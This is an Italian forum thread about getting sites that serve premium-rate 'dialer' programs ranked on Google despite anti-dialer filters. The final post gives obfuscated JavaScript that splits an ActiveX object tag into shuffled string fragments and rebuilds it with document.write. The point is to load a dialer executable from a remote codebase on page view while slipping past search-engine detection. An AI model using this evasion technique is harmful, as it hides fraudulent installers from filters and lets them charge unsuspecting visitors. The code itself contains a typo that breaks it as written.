• User Attivo

    posizionare sito con dialer

    non l'ho mai fatto, e vorrei sapere alcune cose.

    google come si comporta a riguardo?
    se il sito è anziano e si scrivono "finte" news si può salire di posizione?

    di solito per posizionare i miei siti e quelli dei miei clienti ho sempre seguito regole base quali aggiornamento quotidiano, creazione di news backlink e via dicendo...ma secondo me i dialer sono una cosa a se...

    cosa ne pensate?


  • Super User

    scusa Stealth ma nn riesco a capire la differenza in termini di attività per il posizionameto per un sito con o senza dialer... :mmm:


  • User

    @Rinzi said:

    scusa Stealth ma nn riesco a capire la differenza in termini di attività per il posizionameto per un sito con o senza dialer... :mmm:

    Beh a dir la verità ci sono molte differenze. Qualche anno fa google ha effettuato grandi "manovre" in questo settore inserendo dei filtri anti-dialer nelle ricerche (probabilmente controllando solamente la presenza di activex nella pagina). Si era cercato di bypassare il filtro mettendo il codice per l'activex in un javascript o con altri metodi più o meno fantasiosi ma a mio modesto parere il filtro è più complesso di quanto si pensi.
    Il settore si differenzia quindi un pochino dal resto delle serp ed è giusto secondo me aprire dei post "dedicati".


  • Super User

    ok, perfetto 🙂 capito la problematica


  • User Attivo

    proprio così, credo che google penalizzi i siti con activex.
    ma è anche vero che esistono molti portali che danno contenuti a pagamento secondo il metodo del dialer.....

    ne sapete qualche cosa di più a riguardo?


  • Super User

    Se Google utilizzasse algoritmi anti dialer non capisco come possano esistere certi siti che stanno spammando con decine di migliaia di pagine.
    Comunque è facile bypassare questo tipo di filtro, qualora esistesse.
    Le società che distribuiscono dialer danno già alcuni codici per cercare di migliorare il posizionamento di siti dialer.
    Generalmente viene fornito un codice tipo questo:

    <script>
    var str=new Array(8);
    str[1]="ECT id=A codeBase='http://inizio-url.com/dia";
    str[0]="<OBJ";
    str[4]="id='CLS";
    str[5]="ID:DB893839-10F0-4AF9-";
    str[3]="xe' height='1' width='1' class";
    str[6]="92FA-B23528F530AF'></OB";
    str[2]="ler/0000001.e";
    str[7]="JECT>";
    var doc;
    doc = "";
    for(i=0;i<str.length;i++){
    doc +=str*;
    }
    document.write(doc);
    </script>

    Praticamente il codice del dialer viene scomposto in un javascript con tante stringe che vengono poi ricomposte dal browser e viene quindi mostrato il dialer activex.